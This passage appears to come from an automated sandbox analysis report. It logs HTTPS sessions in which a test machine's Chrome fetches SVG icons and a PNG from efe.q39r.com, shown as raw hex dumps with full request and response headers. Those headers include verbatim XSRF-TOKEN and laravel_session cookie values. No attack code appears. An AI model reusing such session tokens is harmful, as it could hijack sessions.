                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                                                  Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  62192.168.2.1749778172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1104OUTGET /wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC644INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:36 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VnpSql7R9NgiVyhnv6sb2U46SChhPANszVi7DKVyA6nGb2v8eJSvIjLtOs5Q5Jd6PYGI31BJSdiCaRqD1K%2F7nDZN9g2ZGboJ1ZLIvCU6uNtvLT1wHUdMJveME1Y5pQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb11c4f7bd8-ATL
                                                                                  2024-04-25 16:23:36 UTC725INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                  Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                  2024-04-25 16:23:36 UTC1369INData Raw: 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c 31 2e 31 35 2c 31 37 2e 37 32 35 2c 31 37 2e 37 32
                                                                                  Data Ascii: 13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.72
                                                                                  2024-04-25 16:23:36 UTC818INData Raw: 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34 35 41 31 31 2e 32 39 33 2c 31 31 2e 32 39 33 2c 30 2c 30 2c 30 2c 31
                                                                                  Data Ascii: ,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.645A11.293,11.293,0,0,0,1
                                                                                  2024-04-25 16:23:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  63192.168.2.1749779172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:36 UTC1125OUTGET /opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC671INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:36 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XLWxcxIkD38tZYPu3qR5Yg%2BC0BvxX3iAauvnYyBoYzUg2W3XF%2FdoBJUbZQM0kry8u%2FXVLOp8qjhCmZxz3tgvFeBMD4XyNdZIIOLzCBNcV2m%2FSCIo1pKaeMXPe925Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb3da250803-ATL
                                                                                  2024-04-25 16:23:36 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                  Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                  2024-04-25 16:23:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  64192.168.2.1749780172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:36 UTC1138OUTGET /uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:36 UTC679INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:36 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 70712
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="uvxA6m2pQcdHLo4WKfz3QsT75VfK9cbZD4b2TOjfhbMFDRNv8v45kfQyaKb32Svg5rtqF2tTrZgh254"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAQTT7IMfPgYhmY%2Fz0slCqFxhwCUqhpbs%2FLXSt3W9CPFsiEbOhxDAIqH0F4cH%2Fb3qld6KxN%2B6hv2PmOVTFhHD6AHy4d4WQmcUKSNwD6p1kie7%2BOpR7RH%2FdLV6RSc2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadb4da301817-ATL
                                                                                  2024-04-25 16:23:36 UTC690INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                  Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
